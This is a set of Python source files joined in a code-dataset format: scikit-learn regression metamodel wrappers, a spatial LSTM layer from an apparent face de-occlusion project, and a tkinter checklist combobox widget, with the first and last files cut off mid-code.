Fits the model to the data such that it reproduces the expected
output data.
:param x_train: array-like of shape [n_samples,n_features]
training data
:param y_train: array-like of shape [n_samples, n_targets]
target values
"""
ols = LinearRegression(**self.kwargs)
self._update_pipeline_and_fit(x_train, y_train, [ols])
class Lasso(MetaModel):
"""
Fits a linear model to the data using a multitask lasso
implementation with built-in cross-validation.
See http://scikit-learn.org/stable/modules/linear_model.html#lasso
for a general explanation of the lasso method.
:param kwargs: keyword arguments that will be passed on to the
constructor of the lasso model.
"""
def __init__(self, **kwargs):
MetaModel.__init__(self, **kwargs)
def fit(self, x_train, y_train):
self.kwargs['cv'] = 3
lasso = MultiTaskLassoCV(**self.kwargs)
self._update_pipeline_and_fit(x_train, y_train, [lasso])
class RidgeRegressionModel(MetaModel):
""" """
def __init__(self, **kwargs):
MetaModel.__init__(self, **kwargs)
def fit(self, x_train, y_train):
self.kwargs['cv'] = 3
regr = RidgeCV(**self.kwargs)
self._update_pipeline_and_fit(x_train, y_train, [regr])
class ElasticNetModel(MetaModel):
"""
Fits a linear model to the data using a multitask *elastic net*
implementation with built-in cross-validation. See
http://scikit-learn.org/stable/modules/linear_model.html#elastic-net
for a general explanation of the elastic net method.
:param kwargs: keyword arguments that will be passed on to the
constructor of the lasso model.
"""
def __init__(self, **kwargs):
MetaModel.__init__(self, **kwargs)
def fit(self, x_train, y_train):
self.kwargs['cv'] = 3
elastic_net = MultiTaskElasticNetCV(**self.kwargs)
self._update_pipeline_and_fit(x_train, y_train, [elastic_net])
class Kriging(MetaModel):
"""
Fits a gaussian process to the data while optionally using
GridSearchCV for an exhaustive search over specified
parameter values. See
http://scikit-learn.org/stable/modules/gaussian_process.html
for a general explanation of gaussian processes and regression
with gaussian processes.
:param kwargs: keyword arguments that will be passed on to the
constructor of the gaussian process.
"""
def __init__(self, **kwargs):
MetaModel.__init__(self, **kwargs)
def fit(self, x_train, y_train):
clf = GaussianProcessRegressor(alpha=0.01, n_restarts_optimizer=100,
random_state=np.random.randint(1000))
self._update_pipeline_and_fit(x_train, y_train, [clf])
class KNeighborsModel(MetaModel):
"""
Uses nearest neighbors regression to represent a function that maps
input values to output values while optionally using GridSearchCV
for an exhaustive search over specified parameter values. See
http://scikit-learn.org/stable/modules/neighbors.html#regression
for a general explanation of nearest neighbors regression.
:param kwargs: keyword arguments that will be passed on to the
constructor of the nearset neighbors regressor.
Additional keyword arguments:
:param_grid: If the parameter *param_grid* is present in the
keyword arguments it will be used to set up an exhaustive grid
search for the best estimator among all combinations of
hyperparameters such as the number of neighbors *n_neighbours*
to consider and the way how the neighbors are weighed *weights*.
See http://scikit-learn.org/stable/modules/grid_search.html for
an example of such a *param_grid*.
"""
def __init__(self, **kwargs):
MetaModel.__init__(self, **kwargs)
def fit(self, x_train, y_train):
if 'param_grid'in self.kwargs:
param_grid = self.kwargs['param_grid']
else:
param_grid = {
'n_neighbors': sp_randint(1, 15)
}
clf = RandomizedSearchCV(
neighbors.KNeighborsRegressor(),
param_distributions=param_grid,
n_iter=5,
cv=3,
iid=True)
self._update_pipeline_and_fit(x_train, y_train, [clf])
class ArtificialNeuralNetwork(MetaModel):
""" """
def __init__(self, **kwargs):
MetaModel.__init__(self, **kwargs)
def fit(self, x_train, y_train):
self.processing_steps = [StandardScaler()]
ann = MLPRegressor()
params = {'hidden_layer_sizes': sp_randint(20, 150),
'alpha': sp_uniform(0, 100),
'max_iter': sp_randint(100, 2000),
'solver': ['lbfgs'],
# 'identity', 'logistic', 'tanh', 'relu'
'activation': ['relu']}
if 'hidden_layer_sizes' in self.kwargs:
self.kwargs['hidden_layer_sizes'] = self.parsefunction(
self.kwargs['hidden_layer_sizes']
)
params.update(self.kwargs)
clf = RandomizedSearchCV(
estimator=ann,
param_distributions=params,
n_iter=10,
scoring=self.score['function'],
cv=3,
iid=True)
self._update_pipeline_and_fit(x_train, y_train, [clf])
def parsefunction(self, string_tuple):
array = []
for string in string_tuple:
tuple = self.parse_tuple(string)
if tuple is None:
tuple = int(string)
array.append(tuple)
return array
def parse_tuple(self, string):
try:
s = eval(string)
if type(s) == tuple:
return s
return
except:
return
class SupportVectorRegression(MetaModel):
def __init__(self, **kwargs):
MetaModel.__init__(self, **kwargs)
def fit(self, x_train, y_train):
self.processing_steps = [StandardScaler()]
svr = SVR(kernel='rbf', gamma=0.1)
# http://www.csie.ntu.edu.tw/~cjlin/papers/guide/guide.pdf
# C = [2**i for i in np.arange(start=-5, stop=16, step=2)]
# gamma = [2**i for i in np.arange(start=-15, stop=4, step=2)]
# https://stats.stackexchange.com/questions/43943/
# which-search-range-for-determining-svm-optimal-c-
# and-gamma-parameters
C = [2 ** i for i in [-3, -2, -1, 0, 1, 2, 3, 4, 5]]
gamma = [2 ** i for i in [-5, -4, -3, -2, -1, 0, 1, 2, 3]]
params = {"C": sp_uniform(0.125, 32),
"gamma": sp_uniform(0.03125, 8)}
params.update(self.kwargs)
reg = RandomizedSearchCV(
estimator=svr,
param_distributions=params,
n_iter=10,
scoring=self.score['function'],
cv=3,
iid=True)
clf = MultiOutputRegressor(reg)
self._update_pipeline_and_fit(x_train, y_train, [clf])
class DecisionTreeRegression(MetaModel):
def __init__(self, **kwargs):
MetaModel.__init__(self, **kwargs)
def fit(self, x_train, y_train):
if 'param_grid' in self.kwargs:
raise Exception('not implemented')
else:
clf = tree.DecisionTreeRegressor()
self._update_pipeline_and_fit(x_train, y_train, [clf])
class KernelRidgeRegression(MetaModel):
def __init__(self, **kwargs):
MetaModel.__init__(self, **kwargs)
def fit(self, x_train, y_train):
if 'param_grid' in self.kwargs:
raise Exception('not implemented')
else:
clf = KernelRidge(alpha=1.0)
self._update_pipeline_and_fit(x_train, y_train, [clf])
class KernelRidgeRegressionCV(MetaModel):
def __init__(self, **kwargs):
MetaModel.__init__(self, **kwargs)
def fit(self, x_train, y_train):
if all([np.isscalar(param) | |
<reponame>zhaofang0627/face-deocc-lstm<gh_stars>10-100
from util import *
import numpy as np
class LSTM(object):
def __init__(self, lstm_config):
self.name_ = lstm_config.name
num_lstms = lstm_config.num_hid
assert num_lstms > 0
self.num_lstms_ = num_lstms
self.has_input_ = lstm_config.has_input
self.has_output_ = lstm_config.has_output
self.has_spatial_ = lstm_config.has_spatial
self.has_spatial_dec_ = lstm_config.has_spatial_dec
self.image_dims_ = lstm_config.image_dims
self.image_side_ = lstm_config.image_side
self.input_dims_ = lstm_config.input_dims
self.input_patch_side_ = lstm_config.input_patch_side
self.output_patch_side_ = lstm_config.output_patch_side
self.output_dims_ = lstm_config.output_dims
self.use_relu_ = lstm_config.use_relu
self.input_dropprob_ = lstm_config.input_dropprob
self.output_dropprob_ = lstm_config.output_dropprob
self.i_ = 0
self.j_ = 0
self.is_imput_mr_ = 0
self.w_dense_row_ = Param((5 * num_lstms, num_lstms), lstm_config.w_dense)
self.w_dense_col_ = Param((5 * num_lstms, num_lstms), lstm_config.w_dense)
self.w_diag_ = Param((num_lstms, 5), lstm_config.w_diag)
self.b_ = Param((5 * num_lstms, 1), lstm_config.b)
self.param_list_ = [
('%s:w_dense_row' % self.name_, self.w_dense_row_),
('%s:w_dense_col' % self.name_, self.w_dense_col_),
('%s:w_diag' % self.name_, self.w_diag_),
('%s:b' % self.name_, self.b_),
]
if self.has_input_:
assert self.input_dims_ > 0
self.w_input_ = Param((5 * num_lstms, self.input_dims_), lstm_config.w_input)
self.param_list_.append(('%s:w_input' % self.name_, self.w_input_))
if self.has_spatial_:
self.w_input_mr_ = Param((5 * num_lstms, self.input_dims_), lstm_config.w_input)
self.param_list_.append(('%s:w_input_mr' % self.name_, self.w_input_mr_))
if self.has_output_:
assert self.output_dims_ > 0
self.w_output_ = Param((self.output_dims_, num_lstms), lstm_config.w_output)
self.param_list_.append(('%s:w_output' % self.name_, self.w_output_))
self.b_output_ = Param((self.output_dims_, 1), lstm_config.b_output)
self.param_list_.append(('%s:b_output' % self.name_, self.b_output_))
def HasInputs(self):
return self.has_input_
def HasOutputs(self):
return self.has_output_
def GetParams(self):
return self.param_list_
def SetBatchSize(self, batch_size, row_length, col_length, stride=0):
assert batch_size > 0
assert row_length > 0
assert col_length > 0
self.batch_size_ = batch_size
self.row_length_ = row_length
self.col_length_ = col_length
self.stride_ = stride
seq_length = row_length * col_length
self.gates_ = cm.empty((5 * self.num_lstms_, batch_size * seq_length))
self.cell_ = cm.empty((self.num_lstms_, batch_size * seq_length))
self.hidden_ = cm.empty((self.num_lstms_, batch_size * seq_length))
self.gates_deriv_ = cm.empty_like(self.gates_)
self.cell_deriv_ = cm.empty_like(self.cell_)
self.hidden_deriv_ = cm.empty_like(self.hidden_)
if self.has_input_ and self.has_spatial_:
self.para_atten_ = cm.empty((5, batch_size))
self.F_x_ = cm.empty((self.input_patch_side_ * self.image_side_, batch_size))
self.F_y_ = cm.empty((self.input_patch_side_ * self.image_side_, batch_size))
self.patches_ = cm.empty((self.input_dims_, batch_size * seq_length))
self.patches_mr_ = cm.empty((self.input_dims_, batch_size * seq_length))
self.patches_left_ = cm.empty((self.input_patch_side_ * self.image_side_, batch_size))
if self.has_output_ and self.has_spatial_dec_:
self.para_atten_hat_ = cm.empty((5, batch_size))
self.F_x_hat_ = cm.empty((self.output_patch_side_ * self.image_side_, batch_size * seq_length))
self.F_y_hat_ = cm.empty((self.output_patch_side_ * self.image_side_, batch_size * seq_length))
self.output_patch_ = cm.empty((self.output_dims_, batch_size))
self.canvas_ = cm.empty((self.image_dims_, batch_size))
self.canvas_left_ = cm.empty((self.image_side_ * self.output_patch_side_, batch_size))
self.output_patch_deriv_ = cm.empty_like(self.output_patch_)
"""
if self.has_output_ and self.output_dropprob_ > 0:
self.output_drop_mask_ = cm.empty_like(self.hiddenbatch_size, self.num_lstms_)) for i in xrange(seq_length)]
self.output_intermediate_state_ = [cm.empty((batch_size, self.num_lstms_)) for i in xrange(seq_length)]
self.output_intermediate_deriv_ = [cm.empty((batch_size, self.num_lstms_)) for i in xrange(seq_length)]
if self.has_input_ and self.input_dropprob_ > 0:
self.input_drop_mask_ = [cm.empty((batch_size, self.input_dims_)) for i in xrange(seq_length)]
self.input_intermediate_state_ = [cm.empty((batch_size, self.input_dims_)) for i in xrange(seq_length)]
self.input_intermediate_deriv_ = [cm.empty((batch_size, self.input_dims_)) for i in xrange(seq_length)]
"""
def Load(self, f):
for name, p in self.param_list_:
p.Load(f, name)
def Save(self, f):
for name, p in self.param_list_:
p.Save(f, name)
def Fprop(self, input_frame=None, init_cell=None, init_hidden=None, occ_pre=None, input_mr=None, output_frame=None, prev_model_hidden=None, reverse=False):
if reverse:
i = self.col_length_ - 1 - self.i_
j = self.row_length_ - 1 - self.j_
else:
i = self.i_
j = self.j_
t = self.i_ * self.row_length_ + self.j_
batch_size = self.batch_size_
assert i >= 0
assert j >= 0
assert i < self.col_length_
assert j < self.row_length_
num_lstms = self.num_lstms_
start = t * batch_size
end = start + batch_size
gates = self.gates_.slice(start, end)
cell_state = self.cell_.slice(start, end)
hidden_state = self.hidden_.slice(start, end)
if t == 0:
if init_cell is None:
if input_frame is not None:
assert self.has_input_
if self.has_spatial_:
patches = self.patches_.slice(start, end)
start_row = i * self.stride_
start_col = j * self.stride_
cm.get_glimpses_matrix_scan(self.F_x_, self.F_y_, start_row, start_col, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(self.patches_left_, self.F_y_, self.para_atten_, input_frame, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(patches, self.F_x_, self.para_atten_, self.patches_left_, self.input_patch_side_, self.image_side_)
gates.add_dot(self.w_input_.GetW(), patches)
if input_mr is not None:
self.is_imput_mr_ = 1
patches_mr = self.patches_mr_.slice(start, end)
start_row_mr = start_row - self.input_patch_side_/2
start_col_mr = start_col - self.input_patch_side_/2
if start_row_mr < 0:
start_row_mr = 0
elif start_row_mr + self.input_patch_side_*2 > self.image_side_:
start_row_mr = self.image_side_ - self.input_patch_side_*2
if start_col_mr < 0:
start_col_mr = 0
elif start_col_mr + self.input_patch_side_*2 > self.image_side_:
start_col_mr = self.image_side_ - self.input_patch_side_*2
cm.get_glimpses_matrix_scan_mr3(self.F_x_, self.F_y_, start_row_mr, start_col_mr, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(self.patches_left_, self.F_y_, self.para_atten_, input_frame, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(patches_mr, self.F_x_, self.para_atten_, self.patches_left_, self.input_patch_side_, self.image_side_)
gates.add_dot(self.w_input_mr_.GetW(), patches_mr)
else:
gates.add_dot(self.w_input_.GetW(), input_frame)
gates.add_col_vec(self.b_.GetW())
cm.lstm_fprop_spatial_init(gates, cell_state, hidden_state, self.w_diag_.GetW())
else:
cell_state.add(init_cell)
assert init_hidden is not None
hidden_state.add(init_hidden)
elif self.i_ == 0:
prev_row_start = start - batch_size
prev_row_hidden_state = self.hidden_.slice(prev_row_start, start)
prev_row_cell_state = self.cell_.slice(prev_row_start, start)
if input_frame is not None:
assert self.has_input_
if self.has_spatial_:
patches = self.patches_.slice(start, end)
start_row = i * self.stride_
start_col = j * self.stride_
cm.get_glimpses_matrix_scan(self.F_x_, self.F_y_, start_row, start_col, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(self.patches_left_, self.F_y_, self.para_atten_, input_frame, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(patches, self.F_x_, self.para_atten_, self.patches_left_, self.input_patch_side_, self.image_side_)
gates.add_dot(self.w_input_.GetW(), patches)
if input_mr is not None:
patches_mr = self.patches_mr_.slice(start, end)
start_row_mr = start_row - self.input_patch_side_/2
start_col_mr = start_col - self.input_patch_side_/2
if start_row_mr < 0:
start_row_mr = 0
elif start_row_mr + self.input_patch_side_*2 > self.image_side_:
start_row_mr = self.image_side_ - self.input_patch_side_*2
if start_col_mr < 0:
start_col_mr = 0
elif start_col_mr + self.input_patch_side_*2 > self.image_side_:
start_col_mr = self.image_side_ - self.input_patch_side_*2
cm.get_glimpses_matrix_scan_mr3(self.F_x_, self.F_y_, start_row_mr, start_col_mr, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(self.patches_left_, self.F_y_, self.para_atten_, input_frame, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(patches_mr, self.F_x_, self.para_atten_, self.patches_left_, self.input_patch_side_, self.image_side_)
gates.add_dot(self.w_input_mr_.GetW(), patches_mr)
else:
gates.add_dot(self.w_input_.GetW(), input_frame)
gates.add_dot(self.w_dense_row_.GetW(), prev_row_hidden_state)
gates.add_col_vec(self.b_.GetW())
cm.lstm_fprop_spatial_row_init(gates, prev_row_cell_state, cell_state, hidden_state, self.w_diag_.GetW())
elif self.j_ == 0:
prev_col_start = (self.i_ - 1) * self.row_length_ * batch_size
prev_col_end = prev_col_start + batch_size
prev_col_hidden_state = self.hidden_.slice(prev_col_start, prev_col_end)
prev_col_cell_state = self.cell_.slice(prev_col_start, prev_col_end)
if input_frame is not None:
assert self.has_input_
if self.has_spatial_:
patches = self.patches_.slice(start, end)
start_row = i * self.stride_
start_col = j * self.stride_
cm.get_glimpses_matrix_scan(self.F_x_, self.F_y_, start_row, start_col, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(self.patches_left_, self.F_y_, self.para_atten_, input_frame, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(patches, self.F_x_, self.para_atten_, self.patches_left_, self.input_patch_side_, self.image_side_)
gates.add_dot(self.w_input_.GetW(), patches)
if input_mr is not None:
patches_mr = self.patches_mr_.slice(start, end)
start_row_mr = start_row - self.input_patch_side_/2
start_col_mr = start_col - self.input_patch_side_/2
if start_row_mr < 0:
start_row_mr = 0
elif start_row_mr + self.input_patch_side_*2 > self.image_side_:
start_row_mr = self.image_side_ - self.input_patch_side_*2
if start_col_mr < 0:
start_col_mr = 0
elif start_col_mr + self.input_patch_side_*2 > self.image_side_:
start_col_mr = self.image_side_ - self.input_patch_side_*2
cm.get_glimpses_matrix_scan_mr3(self.F_x_, self.F_y_, start_row_mr, start_col_mr, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(self.patches_left_, self.F_y_, self.para_atten_, input_frame, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(patches_mr, self.F_x_, self.para_atten_, self.patches_left_, self.input_patch_side_, self.image_side_)
gates.add_dot(self.w_input_mr_.GetW(), patches_mr)
else:
gates.add_dot(self.w_input_.GetW(), input_frame)
gates.add_dot(self.w_dense_col_.GetW(), prev_col_hidden_state)
gates.add_col_vec(self.b_.GetW())
cm.lstm_fprop_spatial_col_init(gates, prev_col_cell_state, cell_state, hidden_state, self.w_diag_.GetW())
else:
prev_row_start = start - batch_size
prev_row_hidden_state = self.hidden_.slice(prev_row_start, start)
prev_row_cell_state = self.cell_.slice(prev_row_start, start)
prev_col_start = ((self.i_ - 1) * self.row_length_ + self.j_) * batch_size
prev_col_end = prev_col_start + batch_size
prev_col_hidden_state = self.hidden_.slice(prev_col_start, prev_col_end)
prev_col_cell_state = self.cell_.slice(prev_col_start, prev_col_end)
if input_frame is not None:
assert self.has_input_
if self.has_spatial_:
patches = self.patches_.slice(start, end)
start_row = i * self.stride_
start_col = j * self.stride_
cm.get_glimpses_matrix_scan(self.F_x_, self.F_y_, start_row, start_col, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(self.patches_left_, self.F_y_, self.para_atten_, input_frame, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(patches, self.F_x_, self.para_atten_, self.patches_left_, self.input_patch_side_, self.image_side_)
gates.add_dot(self.w_input_.GetW(), patches)
if input_mr is not None:
patches_mr = self.patches_mr_.slice(start, end)
start_row_mr = start_row - self.input_patch_side_/2
start_col_mr = start_col - self.input_patch_side_/2
if start_row_mr < 0:
start_row_mr = 0
elif start_row_mr + self.input_patch_side_*2 > self.image_side_:
start_row_mr = self.image_side_ - self.input_patch_side_*2
if start_col_mr < 0:
start_col_mr = 0
elif start_col_mr + self.input_patch_side_*2 > self.image_side_:
start_col_mr = self.image_side_ - self.input_patch_side_*2
cm.get_glimpses_matrix_scan_mr3(self.F_x_, self.F_y_, start_row_mr, start_col_mr, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(self.patches_left_, self.F_y_, self.para_atten_, input_frame, self.input_patch_side_, self.image_side_)
cm.apply_glmatrix(patches_mr, self.F_x_, self.para_atten_, self.patches_left_, self.input_patch_side_, self.image_side_)
gates.add_dot(self.w_input_mr_.GetW(), patches_mr)
else:
gates.add_dot(self.w_input_.GetW(), input_frame)
gates.add_dot(self.w_dense_row_.GetW(), prev_row_hidden_state)
gates.add_dot(self.w_dense_col_.GetW(), prev_col_hidden_state)
gates.add_col_vec(self.b_.GetW())
cm.lstm_fprop_spatial(gates, prev_row_cell_state, prev_col_cell_state, cell_state, hidden_state, self.w_diag_.GetW())
if self.has_output_:
assert output_frame is not None
if self.has_spatial_dec_:
F_x_hat = self.F_x_hat_.slice(start, end)
F_y_hat = self.F_y_hat_.slice(start, end)
# reconstruct reversely
i = self.col_length_ - 1 - self.i_
j = self.row_length_ - 1 - self.j_
start_row = i * self.stride_
start_col = j * self.stride_
self.output_patch_.assign(0)
self.output_patch_.add_dot(self.w_output_.GetW(), hidden_state)
self.output_patch_.add_col_vec(self.b_output_.GetW())
cm.get_glimpses_matrix_scan(F_x_hat, F_y_hat, start_row, start_col, self.output_patch_side_, self.image_side_)
cm.apply_glmatrix_hat(self.canvas_left_, F_y_hat, self.para_atten_hat_, self.output_patch_, self.output_patch_side_, self.image_side_)
cm.apply_glmatrix_hat(self.canvas_, F_x_hat, self.para_atten_hat_, self.canvas_left_, self.output_patch_side_, self.image_side_)
output_frame.add(self.canvas_)
else:
output_frame.add_dot(self.w_output_.GetW(), hidden_state)
output_frame.add_col_vec(self.b_output_.GetW())
self.j_ += 1
if self.j_ == self.row_length_ and self.i_ < self.col_length_-1:
self.j_ = 0
self.i_ += 1
def BpropAndOutp(self, input_frame=None, input_deriv=None,
init_cell=None, init_hidden=None,
init_cell_deriv=None, init_hidden_deriv=None,
prev_model_hidden=None, prev_model_hidden_deriv=None,
input_mr=None, output_deriv=None):
batch_size = self.batch_size_
if self.j_ == 0 and self.i_ > 0:
self.j_ = self.row_length_
self.i_ -= 1
self.j_ -= 1
t = self.i_ * self.row_length_ + self.j_
assert self.i_ >= 0
assert self.j_ >= 0
assert self.i_ < self.col_length_
assert self.j_ < self.row_length_
num_lstms = self.num_lstms_
start = t * batch_size
end = start + batch_size
gates = self.gates_.slice(start, end)
gates_deriv = self.gates_deriv_.slice(start, end)
cell_state = self.cell_.slice(start, end)
cell_deriv = self.cell_deriv_.slice(start, | |
<filename>checklistcombobox.py
import tkinter as tk # Python 3 only
import tkinter.ttk as ttk
import tkinter.font as tkfont
import numpy as np
# GUI features to test (X means completed):
# 1.) Both 'normal' and 'readonly'
# X Pressing Tab at any time (popdown or no) moves to the next widget
# X Pressing Tab with an item highlighted selects that item and then moves to the next widget
# X Pressing up/down arrows when the popdown menu is down moves the selection up/down
# X Pressing up/down on top/bottom selections scrolls the view down by 1 line
# X Pressing Escape with the popdown visible hides the popdown
# X Scrollwheel when popdown is down scrolls by 4 units (Listbox source code)
# X Clicking the trough of the scrollwheel moves the view by 1 "page"
# X When the popdown window appears, the view is set automatically to where the current
# selection is. If the current selection is not in view, the view is set such that
# the selection is centered (using integer math). If the selection is in view, no
# scrolling is done and the selection is not centered. If the selection is only 1 item
# away from being in view, the view is set such that the item is in view, but is either
# at the very top or very bottom depending on which side it was closest to.
# X PageUp/PageDown keys do the same thing as the scrollwheel trough
# X A scrollbar is placed in the dropdown menu when the number of values in the list
# exceeds the height of the list (= height of the combobox)
# X There is 1 pixel of whitespace between the listbox items and the popdown frame
# X There are 2 pixels of whitespace between the scrollbar and the listbox items
# X The Enter key does the same thing as clicking on the currently highlighted item
# X Control+Home and Control+End go to the top and bottom of the listbox respectively
# X Click+Drag should work the same as regular Drag, but when the button is released, the
# highlighted item is selected. This is true while INSIDE the popdown menu. When OUTSIDE,
# the canvas should be scrolled "automatically" up or down
# 2.) state = 'normal'
# X When a selection is made, the text in the Entry widget is highlighted
# X Can click inside the Entry widget without creating the popdown
# X Can type anything into the Entry widget
# X Text does not change in Entry widget until a selection is made
# X Tabbing in to the widget highlights the text in the Entry widget
# 3.) state = 'disabled'
# X Clicking the widget does nothing
# X Cannot tab into the widget
# X Colors change to a 'disabled' theme
# 4.) state = 'readonly'
# X Clicking the Entry widget makes the popdown appear
# X Entire Entry widget space is highlighted after making a selection
# X Typing does nothing
# X Tabbing into the widget highlights the entire Entry widget
class ChecklistCombobox(ttk.Combobox):
"""
ChecklistCombobox v1.1
Author: <NAME>
November 2020
This widget is a regular ttk.Combobox, but instead of a Listbox in the popdown
window, there is a list of checkboxes. It is designed to function almost
identically to a ttk.Combobox, except for some fringe cases. Learning from
mistakes made in tkinter, this widget is fully customizable to the extent that
tkinter allows.
The standard Listbox widget from ttk.Combobox is unfortunately inseparable from
the popdown menu because a majority of the tcl code for ttk.Combobox would need
to be replaced. This would mangle any other regular ttk.Combobox widgets
attached to the Tk() instance. Instead, we simply put stuff on top of the
Listbox.
Here is a tree of widgets that are accessible to the user. Tree depth indicates
widget stacking. For example, ChecklistCombobox.popdown is a subwidget (child)
of ChecklistCombobox.
Tree Widget type
ChecklistCombobox ttk.Combobox
ChecklistCombobox.popdown tk.Toplevel
ChecklistCombobox.popdown_frame special popdown frame widget
ChecklistCombobox.listbox tk.Listbox
ChecklistCombobox.scrollbar ttk.Scrollbar
ChecklistCombobox.canvas tk.Canvas
ChecklistCombobox.checkbutton_frame tk.Frame
ChecklistCombobox.checkbuttons list with length = len(values)
tk.Checkbutton
Any of these widgets can be accessed by the user by simply calling them. For
example, to change the height of all the checkbuttons, you can do,
```
cb = ChecklistCombobox(root,values=('1','2','3','4'))
for button in cb.checkbuttons:
button.configure(height=2)
```
Equivalently, you can do,
```
cb = ChecklistCombobox(root,values=('1','2','3','4'))
cb.configure(checkbutton_height=2)
```
This is because this class handles the configure method in a special way. The
keywords are parsed and then passed to the appropriate widgets based on the
prefix they are given. Supported prefixes are,
```
popdown_
popdown_frame_
scrollbar_
canvas_
checkbutton_frame_
checkbutton_
checkbutton_selected_
```
Prefix `checkbutton_selected_` can be used to specify the Checkbutton attributes
when they are highlighted, but only the `background`, `foreground`,
`selectcolor`, `activeforeground`, and `activebackground`.
Be careful when using `popdown_frame_` and `scrollbar_` because they are special
widgets exclusive to the Combobox Popdown menu. You can list their options by
doing `print(cb.popdown_frame.configure())`. All other prefixes work in the way
you would expect. Given some option X from the tkinter widget documentation, you
can change the option using,
```
ChecklistCombobox.configure(prefix_X)
```
You can even configure the checkbuttons separately by giving an array-like
(`list`, `tuple`, or `numpy.ndarray`) argument where the elements have the same
order as the `values` keyword.
So as to avoid confusion, the original ttk.Combobox tcl source code which this
code was based on has been included at the bottom of this code.
Also near the bottom of this code is a short test program you can use simply by
running `python checklistcombobox.py`.
"""
def __init__(self,master=None,**kw):
self.values = kw.pop('values',None)
if self.values is None: self.values = []
if not isinstance(self.values,(list,tuple,np.ndarray)): self.values = list(self.values)
### Create the widgets
# Create the Combobox
ttk.Combobox.__init__(self,master,values=self.values)
self.tk.eval('ttk::combobox::ConfigureListbox %s' % (self)) # This updates the listbox in the popdown
# Break the Combobox down into its constituent parts
self.popdown = tk.Toplevel()
self.popdown.withdraw()
self.popdown._w = '%s.popdown' % (self)
self.popdown_frame = tk.Frame()
self.popdown_frame._w = '%s.popdown.f' % (self)
self.listbox = tk.Listbox()
self.listbox._w = '%s.popdown.f.l' % (self)
self.scrollbar = tk.Scrollbar()
self.scrollbar_repeatdelay = self.scrollbar.cget('repeatdelay')
self.scrollbar_repeatinterval = self.scrollbar.cget('repeatinterval')
self.scrollbar._w = '%s.popdown.f.sb' % (self)
# Create the checkbuttons
self.canvas_frame = tk.Frame(self.popdown_frame) # Frame in front of canvas for borders
self.canvas = tk.Canvas(self.canvas_frame) # Canvas for scrolling
self.checkbutton_frame = tk.Frame(self.canvas) # Checkbutton container
self.checkbuttons = []
self.variables = []
self.selection = None
if len(self.values) > 0: self.create_checkbuttons()
### Grid the widgets
self.checkbutton_frame.grid_propagate(0)
self.checkbutton_frame.columnconfigure(0,weight=1)
self.canvas_frame.grid_propagate(0)
self.canvas_frame.columnconfigure(0,weight=1)
#for i,button in enumerate(self.checkbuttons):
# button.grid(row=i,column=0,sticky='news')
self.canvas.grid(row=0,column=0,sticky='news')
self.checkbutton_frame.grid(row=0,column=0,sticky='news')
self.canvas.create_window((0,0),window=self.checkbutton_frame,anchor='nw')
self.canvas_frame.grid(row=0,column=0,padx=1,pady=1,sticky='news')
### Initialize
self.listbox.configure(yscrollcommand='') # Break connection between listbox and scrollbar
self.configure(**kw) # Do initial configuration
# Make sure the popdown is ready to go the first time
self.last_clicked_button = None
self.autoscrolling = False
self.mouse_has_entered_popdown = False
self.afterId = None
self.b1_motion_entered_popdown = False
self.configure_popdown() # Initial configuration
self.topbutton = 0
if len(self.cget('values')) > self.cget('height'):
self.bottombutton = self.cget('height')-1
else:
self.bottombutton = len(self.checkbuttons)-1
self.previous_button_kw = {}
if self.checkbuttons:
self.selection = 0
for key in self.checkbuttons[self.selection].keys():
self.previous_button_kw[key] = self.checkbuttons[self.selection].cget(key)
# Select the button
self.checkbuttons[self.selection].configure(bg=self.checkbutton_selected_background[self.selection],
fg=self.checkbutton_selected_foreground[self.selection],
selectcolor=self.checkbutton_selected_selectcolor[self.selection],
activebackground=self.checkbutton_selected_activebackground[self.selection],
activeforeground=self.checkbutton_selected_activeforeground[self.selection])
### Create keybindings
self.listbox.bind("<Down>",self.on_down) # Down arrow
self.listbox.bind("<Up>",self.on_up) # Up arrow
self.listbox.bind("<Prior>",lambda event: self.scroll(event,amount=-1,units='pages')) # PageUp
self.listbox.bind("<Next>",lambda event: self.scroll(event,amount=1,units='pages')) # PageDown
self.listbox.bind("<Control-Home>",lambda event: self.select(self.checkbuttons[0]))
self.listbox.bind("<Control-End>",lambda event: self.select(self.checkbuttons[-1]))
self.listbox.bind("<KeyPress-Return>",self.on_carraige_return) # Enter
self.listbox.bind("<Motion>",self.do_nothing) # Mouse motions
self.listbox.bind("<KeyPress-Tab>",self.on_lb_tab) # Tab
self.listbox.bind("<<PrevWindow>>",self.on_lb_prevwindow) # Relates to the Tab key
self.listbox.bind("<MouseWheel>",self.do_nothing)
#self.listbox.bind("<Map>",self.do_nothing) # This almost works
self.bind("<MouseWheel>",self.do_nothing) # MouseWheel on Entry widget in this case is nonsensical
if self.tk.eval('if {[tk windowingsystem] eq "x11"} {expr {1}} else {expr {0}}'):
self.bind("<ButtonPress-4>",self.do_nothing)
self.bind("<ButtonPress-5>",self.do_nothing)
self.popdown.bind("<MouseWheel>",self.on_popdown_mousewheel)
self.bind("<ButtonPress-1>",lambda event: self.popdown.focus_set()) # Don't let the focus get set on the entry widget before mapping, to avoid "flickering"
#self.listbox.bind("<Map>",self.configure_popdown) # When the listbox is mapped, reconfigure the popdown
self.popdown_frame.bind("<Configure>",self.configure_popdown)
#self.popdown_frame.bind("<Map>",self.scroll_to_last_clicked_button)
self.popdown.bind("<Unmap>",self.popdown_unmap)
self.bind("<FocusOut>",self.popdown_unmap)
self.popdown.bind("<Motion>",self.on_motion)
self.popdown.bind("<B1-Motion>",self.on_b1_motion)
#self.scrollbar.bind("<ButtonPress-1>",self.on_scrollbar_click_press)
#self.scrollbar.bind("<ButtonRelease-1>",self.on_scrollbar_click_release)
def __getattribute__(self,attr):
# Custom configure function
if attr == 'configure' or attr == 'config':
return self.custom_configure
return super(ChecklistCombobox,self).__getattribute__(attr)
def custom_configure(self,cnf=None,**kw):
